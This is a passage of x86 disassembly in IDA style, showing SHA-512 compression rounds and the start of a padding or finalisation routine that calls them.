mov eax, [esp+170h+var_C8]
mov ecx, [esp+170h+var_C4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_C4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_F8]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_F4]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_F8]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_F4]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_B8]
adc edx, [esp+170h+var_B4]
add ecx, [esp+170h+var_E8]
adc edx, [esp+170h+var_E4]
mov [eax+0A0h], ecx
mov [eax+0A4h], edx
mov eax, edx
mov [esp+170h+var_E8], ecx
mov [esp+170h+var_E4], eax
mov [esp+170h+var_68], ecx
jmp short loc_415D3E
; ---------------------------------------------------------------------------
loc_415D29: ; CODE XREF: sub_4143D0+1868�j
mov edx, [esp+170h+var_E8]
mov eax, [esp+170h+var_E4]
mov [esp+170h+var_68], edx
loc_415D3E: ; CODE XREF: sub_4143D0+1957�j
mov ecx, [esp+170h+var_144]
mov ebx, ecx
mov [esp+170h+var_64], eax
mov eax, [esp+170h+var_148]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_144]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_144]
mov ebx, ecx
and ecx, [esp+170h+var_13C]
mov edi, eax
and eax, [esp+170h+var_140]
not ebx
and ebx, [esp+170h+var_134]
not edi
and edi, [esp+170h+var_138]
xor ebx, ecx
mov ecx, [esp+170h+var_12C]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9A0[eax*8]
adc esi, ds:dword_41F9A4[eax*8]
add edx, [esp+170h+var_68]
mov eax, [esp+170h+var_130]
adc esi, [esp+170h+var_64]
add eax, edx
adc ecx, esi
add [esp+170h+var_150], eax
mov [esp+170h+var_12C], ecx
mov [esp+170h+var_130], eax
adc [esp+170h+var_14C], ecx
mov eax, [esp+170h+var_124]
mov ecx, [esp+170h+var_128]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_128]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_11C]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_120]
xor edi, ecx
mov ecx, [esp+170h+var_128]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_158]
and edx, ecx
mov ecx, [esp+170h+var_11C]
xor ebp, eax
and ebp, [esp+170h+var_154]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_130], edi
adc [esp+170h+var_12C], esi
cmp [esp+170h+var_15C], 0
jz loc_415F71
mov eax, [esp+170h+var_B0]
mov ecx, [esp+170h+var_AC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_AC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_F0]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_EC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_F0]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_EC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_A8]
adc edx, [esp+170h+var_A4]
add ecx, [esp+170h+var_F8]
adc edx, [esp+170h+var_F4]
mov [eax+0A8h], ecx
mov [eax+0ACh], edx
mov eax, edx
mov [esp+170h+var_F8], ecx
mov [esp+170h+var_F4], eax
mov [esp+170h+var_50], ecx
jmp short loc_415F80
; ---------------------------------------------------------------------------
loc_415F71: ; CODE XREF: sub_4143D0+1AB0�j
mov edx, [esp+170h+var_F8]
mov eax, [esp+170h+var_F4]
mov [esp+170h+var_50], edx
loc_415F80: ; CODE XREF: sub_4143D0+1B9F�j
mov ecx, [esp+170h+var_14C]
mov ebx, ecx
mov [esp+170h+var_4C], eax
mov eax, [esp+170h+var_150]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_14C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_148]
xor esi, ecx
mov ecx, [esp+170h+var_14C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_144]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_134]
not ebx
and ebx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_140]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9A8[eax*8]
adc esi, ds:dword_41F9AC[eax*8]
add edx, [esp+170h+var_50]
mov eax, [esp+170h+var_138]
adc esi, [esp+170h+var_4C]
add eax, edx
adc ecx, esi
add [esp+170h+var_158], eax
mov [esp+170h+var_134], ecx
mov [esp+170h+var_138], eax
adc [esp+170h+var_154], ecx
mov ecx, [esp+170h+var_130]
mov eax, [esp+170h+var_12C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_130]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_124]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_128]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_130]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_120]
and edx, ecx
mov ecx, [esp+170h+var_124]
xor ebp, eax
and ebp, [esp+170h+var_11C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_138], edi
adc [esp+170h+var_134], esi
cmp [esp+170h+var_15C], 0
jz loc_4161C3
mov eax, [esp+170h+var_C0]
mov ecx, [esp+170h+var_BC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_BC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_E8]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_E4]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_E8]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_E4]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D0]
adc edx, [esp+170h+var_CC]
add ecx, [esp+170h+var_B0]
adc edx, [esp+170h+var_AC]
mov [eax+0B0h], ecx
mov [eax+0B4h], edx
mov eax, edx
mov [esp+170h+var_B0], ecx
mov [esp+170h+var_AC], eax
mov [esp+170h+var_40], ecx
jmp short loc_4161D8
; ---------------------------------------------------------------------------
loc_4161C3: ; CODE XREF: sub_4143D0+1CF6�j
mov edx, [esp+170h+var_B0]
mov eax, [esp+170h+var_AC]
mov [esp+170h+var_40], edx
loc_4161D8: ; CODE XREF: sub_4143D0+1DF1�j
mov ecx, [esp+170h+var_154]
mov [esp+170h+var_3C], eax
mov eax, [esp+170h+var_158]
mov ebx, ecx
xor esi, esi
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
mov edx, ecx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
xor ebx, ebx
or ebx, ebp
mov ebp, [esp+170h+var_154]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
shr ebp, 0Eh
or ecx, ebp
mov ebp, [esp+170h+var_150]
xor esi, ecx
mov ecx, [esp+170h+var_154]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_14C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_144]
xor edi, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9B0[eax*8]
mov edi, [esp+170h+var_12C]
adc esi, ds:dword_41F9B4[eax*8]
add edx, [esp+170h+var_40]
mov eax, [esp+170h+var_140]
adc esi, [esp+170h+var_3C]
add eax, edx
adc ecx, esi
add [esp+170h+var_120], eax
mov esi, [esp+170h+var_130]
mov [esp+170h+var_140], eax
adc [esp+170h+var_11C], ecx
mov [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_138]
mov eax, esi
xor eax, ecx
mov [esp+170h+var_98], eax
mov eax, [esp+170h+var_134]
mov edx, edi
xor edx, eax
mov [esp+170h+var_94], edx
mov edx, esi
and edx, ecx
mov [esp+170h+var_90], edx
mov edx, edi
and edx, eax
mov [esp+170h+var_8C], edx
mov edx, ecx
xor esi, esi
shl edx, 4
mov edi, ecx
mov ebx, eax
shrd edi, ebx, 1Ch
shr ebx, 1Ch
or edx, ebx
or esi, edi
mov ebp, eax
shld ebp, ecx, 1Eh
xor ebx, ebx
shl ecx, 1Eh
or ebx, ebp
mov edi, eax
xor edx, ebx
mov ebx, [esp+170h+var_138]
shr edi, 2
or edi, ecx
mov ecx, eax
shld eax, ebx, 19h
xor esi, edi
shr ecx, 7
xor edi, edi
or edi, eax
mov eax, [esp+170h+var_98]
and eax, [esp+170h+var_128]
shl ebx, 19h
xor eax, [esp+170h+var_90]
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_94]
and ecx, [esp+170h+var_124]
xor edx, edi
xor ecx, [esp+170h+var_8C]
add esi, eax
adc edx, ecx
add [esp+170h+var_140], esi
adc [esp+170h+var_13C], edx
cmp [esp+170h+var_15C], 0
jz loc_41643F
mov eax, [esp+170h+var_A0]
mov ecx, [esp+170h+var_9C]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_9C]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_F8]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_F4]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_F8]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_F4]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D8]
adc edx, [esp+170h+var_D4]
add ecx, [esp+170h+var_C0]
adc edx, [esp+170h+var_BC]
mov [eax+0B8h], ecx
mov [eax+0BCh], edx
mov eax, edx
mov [esp+170h+var_C0], ecx
mov [esp+170h+var_BC], eax
mov [esp+170h+var_30], ecx
jmp short loc_416454
; ---------------------------------------------------------------------------
loc_41643F: ; CODE XREF: sub_4143D0+1F7E�j
mov edx, [esp+170h+var_C0]
mov eax, [esp+170h+var_BC]
mov [esp+170h+var_30], edx
loc_416454: ; CODE XREF: sub_4143D0+206D�j
mov ecx, [esp+170h+var_11C]
mov ebx, ecx
mov [esp+170h+var_2C], eax
mov eax, [esp+170h+var_120]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_11C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
shr ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_158]
xor esi, ecx
mov ecx, [esp+170h+var_11C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_154]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_14C]
not edi
and edi, [esp+170h+var_150]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9B8[eax*8]
adc esi, ds:dword_41F9BC[eax*8]
add edx, [esp+170h+var_30]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_2C]
add ecx, edx
mov edx, [esp+170h+var_144]
adc edx, esi
add eax, ecx
adc [esp+170h+var_124], edx
mov [esp+170h+var_148], ecx
mov ecx, [esp+170h+var_140]
mov [esp+170h+var_144], edx
mov edx, [esp+170h+var_13C]
mov ebx, ecx
mov ebp, edx
shrd ebx, ebp, 1Ch
xor edi, edi
or edi, ebx
mov esi, ecx
mov ebx, edx
shld edx, ecx, 1Eh
shr ebp, 1Ch
shl esi, 4
or esi, ebp
shr ebx, 2
shl ecx, 1Eh
xor ebp, ebp
or ebx, ecx
mov [esp+170h+var_128], eax
or ebp, edx
mov ecx, [esp+170h+var_13C]
xor esi, ebp
mov ebp, [esp+170h+var_140]
mov edx, ecx
shld ecx, ebp, 19h
xor edi, ebx
shr edx, 7
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_98]
and ecx, [esp+170h+var_140]
shl ebp, 19h
xor ecx, [esp+170h+var_90]
or edx, ebp
xor edi, edx
mov edx, [esp+170h+var_94]
and edx, [esp+170h+var_13C]
xor esi, ebx
xor edx, [esp+170h+var_8C]
add edi, ecx
adc esi, edx
add [esp+170h+var_148], edi
adc [esp+170h+var_144], esi
cmp [esp+170h+var_15C], 0
jz loc_4166A0
mov eax, [esp+170h+var_B0]
mov ecx, [esp+170h+var_AC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_AC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_E0]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_DC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_E0]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_DC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor edi, eax
mov eax, [esp+170h+arg_0]
xor esi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_118]
adc edx, [esp+170h+var_114]
add ecx, [esp+170h+var_A0]
adc edx, [esp+170h+var_9C]
mov [eax+0C0h], ecx
mov [eax+0C4h], edx
mov eax, edx
mov [esp+170h+var_9C], eax
mov [esp+170h+var_1C], eax
mov eax, [esp+170h+var_128]
mov [esp+170h+var_A0], ecx
mov [esp+170h+var_20], ecx
jmp short loc_4166BC
; ---------------------------------------------------------------------------
loc_4166A0: ; CODE XREF: sub_4143D0+21CE�j
mov edx, [esp+170h+var_A0]
mov ecx, [esp+170h+var_9C]
mov [esp+170h+var_20], edx
mov [esp+170h+var_1C], ecx
loc_4166BC: ; CODE XREF: sub_4143D0+22CE�j
mov ecx, [esp+170h+var_124]
mov ebx, ecx
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_124]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_120]
xor esi, ecx
mov ecx, [esp+170h+var_124]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_11C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_14C]
not ebx
and ebx, [esp+170h+var_154]
not edi
and edi, [esp+170h+var_158]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9C0[eax*8]
adc esi, ds:dword_41F9C4[eax*8]
add edx, [esp+170h+var_20]
mov eax, [esp+170h+var_150]
adc esi, [esp+170h+var_1C]
add eax, edx
adc ecx, esi
add [esp+170h+var_130], eax
mov [esp+170h+var_14C], ecx
mov [esp+170h+var_150], eax
adc [esp+170h+var_12C], ecx
mov eax, [esp+170h+var_144]
mov ecx, [esp+170h+var_148]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_148]
mov ebp, eax
shld ebp, ebx, 19h
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_13C]
xor ebp, [esp+170h+var_134]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_140]
xor edi, ecx
mov ecx, [esp+170h+var_138]
and ebp, eax
mov eax, [esp+170h+var_13C]
and eax, [esp+170h+var_134]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_150], edi
adc [esp+170h+var_14C], esi
cmp [esp+170h+var_15C], 0
jz loc_4168EA
mov eax, [esp+170h+var_C0]
mov ecx, [esp+170h+var_BC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_BC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_100]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_FC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_100]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_FC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C8]
adc edx, [esp+170h+var_C4]
add ecx, [esp+170h+var_E0]
adc edx, [esp+170h+var_DC]
mov [eax+0C8h], ecx
mov [eax+0CCh], edx
mov eax, edx
mov [esp+170h+var_E0], ecx
mov [esp+170h+var_DC], eax
mov [esp+170h+var_10], ecx
jmp short loc_4168FF
; ---------------------------------------------------------------------------
loc_4168EA: ; CODE XREF: sub_4143D0+2429�j
mov edx, [esp+170h+var_E0]
mov eax, [esp+170h+var_DC]
mov [esp+170h+var_10], edx
loc_4168FF: ; CODE XREF: sub_4143D0+2518�j
mov ecx, [esp+170h+var_12C]
mov ebx, ecx
mov [esp+170h+var_C], eax
mov eax, [esp+170h+var_130]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_12C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_128]
xor esi, ecx
mov ecx, [esp+170h+var_12C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_124]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_154]
not ebx
and ebx, [esp+170h+var_11C]
not edi
and edi, [esp+170h+var_120]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9C8[eax*8]
adc esi, ds:dword_41F9CC[eax*8]
add edx, [esp+170h+var_10]
mov eax, [esp+170h+var_158]
adc esi, [esp+170h+var_C]
add eax, edx
adc ecx, esi
add [esp+170h+var_138], eax
mov [esp+170h+var_154], ecx
mov [esp+170h+var_158], eax
adc [esp+170h+var_134], ecx
mov ecx, [esp+170h+var_150]
mov eax, [esp+170h+var_14C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_150]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
xor edx, edx
or edx, ebp
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_140]
mov ebx, ecx
and ecx, edx
xor ebx, edx
and ebx, [esp+170h+var_148]
mov ebp, eax
xor ebp, [esp+170h+var_13C]
mov edx, ecx
and ebp, [esp+170h+var_144]
mov ecx, [esp+170h+var_13C]
and eax, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_158], edi
mov edi, [esp+170h+var_15C]
adc [esp+170h+var_154], esi
add edi, 10h
cmp edi, 50h
mov [esp+170h+var_15C], edi
jb loc_414560
mov eax, [esp+170h+var_4]
mov edx, [esp+170h+var_158]
add [eax], edx
mov edx, [esp+170h+var_154]
pop edi
adc [eax+4], edx
mov eax, [esp+16Ch+arg_0]
mov edx, [esp+16Ch+var_150]
add [eax+18h], edx
mov edx, [esp+16Ch+var_14C]
pop esi
adc [eax+1Ch], edx
mov edx, [esp+168h+var_148]
add [eax+20h], edx
mov edx, [esp+168h+var_144]
pop ebp
adc [eax+24h], edx
mov edx, [esp+164h+var_140]
add [eax+28h], edx
mov edx, [esp+164h+var_134]
pop ebx
adc [eax+2Ch], ecx
mov ecx, [esp+160h+var_138]
add [eax+30h], ecx
mov ecx, [esp+160h+var_130]
adc [eax+34h], edx
add [eax+38h], ecx
mov edx, [esp+160h+var_12C]
mov ecx, [esp+160h+var_128]
adc [eax+3Ch], edx
add [eax+40h], ecx
mov edx, [esp+160h+var_124]
mov ecx, [esp+160h+var_120]
adc [eax+44h], edx
add [eax+48h], ecx
mov edx, [esp+160h+var_11C]
adc [eax+4Ch], edx
add esp, 160h
retn
sub_4143D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416AE0 proc near ; CODE XREF: .text:00416D62�p
; sub_41B7F9+CA�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
mov ecx, [ebx]
push ebp
and ecx, 7Fh
push esi
lea esi, [ecx+7]
shr esi, 3
push edi
mov [esp+10h+var_4], ecx
jz short loc_416B45
lea edx, [ebx+esi*8+50h]
loc_416AF9: ; CODE XREF: sub_416AE0+5F�j
mov eax, [edx-8]
mov ecx, [edx-4]
sub edx, 8
mov edi, eax
sub esi, 1
ror edi, 8
and edi, 0FF00FF00h
rol eax, 8
and eax, 0FF00FFh
or edi, eax
mov ebp, ecx
xor eax, eax
ror ebp, 8
and ebp, 0FF00FF00h
rol ecx, 8
and ecx, 0FF00FFh
or ebp, ecx
xor ecx, ecx
or eax, ebp
or edi, ecx
test esi, esi
mov [edx], eax
mov [edx+4], edi
jnz short loc_416AF9
mov ecx, [esp+10h+var_4]
loc_416B45: ; CODE XREF: sub_416AE0+13�j
mov eax, ecx
and eax, 7
add eax, eax
add eax, eax
mov esi, dword_4249C0[eax+eax]
mov edi, dword_4249C4[eax+eax]
add eax, eax
mov edx, ecx
shr edx, 3
and esi, [ebx+edx*8+50h]
and edi, [ebx+edx*8+54h]
or esi, dword_424A00[eax]
or edi, dword_424A04[eax]
cmp ecx, 6Fh
mov [ebx+edx*8+50h], esi
mov [ebx+edx*8+54h], edi
jbe short loc_416BAA
cmp ecx, 78h
jnb short loc_416B9D
mov dword ptr [ebx+0C8h], 0
mov dword ptr [ebx+0CCh], 0
loc_416B9D: ; CODE XREF: sub_416AE0+A7�j
push ebx
call sub_4143D0
add esp, 4
xor edx, edx
jmp short loc_416BB2
